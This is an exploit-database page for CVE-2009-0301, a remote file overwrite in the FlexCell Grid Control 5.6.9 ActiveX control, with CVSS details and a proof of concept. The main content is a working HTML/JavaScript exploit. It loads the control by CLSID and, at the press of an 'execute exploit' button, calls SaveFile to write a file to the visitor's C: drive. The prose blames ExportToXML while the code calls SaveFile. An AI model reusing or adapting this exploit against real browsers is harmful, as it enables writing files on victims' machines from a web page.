FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit

2009.01.31

Credit: Houssamix

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2009-0301

CWE: CWE-Other

CVSS Base Score: 6.8/10

Impact Subscore: 6.4/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

<HTML>
<BODY>
<b>
Author : Houssamix <br/> <br/> <br/>
FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit <br/>
ExportToXML() is vuln to <br/>
<b/>
<object id=hsmx classid="clsid:{2A7D9CCE-211A-4654-9449-718F71ED9644}"></object>
<SCRIPT>
/*
Report for Clsid: {2A7D9CCE-211A-4654-9449-718F71ED9644}
RegKey Safe for Script: Faux
RegKey Safe for Init: Faux
Implements IObjectSafety: Vrai
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
*/
function hehe()
{
File = "c:\\hsmx.txt"
hsmx.SaveFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>

References:

http://www.securityfocus.com/bid/33453

http://www.milw0rm.com/exploits/7868

http://secunia.com/advisories/33664

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.